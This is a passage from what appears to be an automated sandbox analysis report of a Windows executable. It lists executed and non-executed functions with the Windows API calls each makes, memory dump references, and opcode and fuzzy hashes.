                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                    Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                    Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                    Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                    Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                    Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                    Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                    Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                    Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
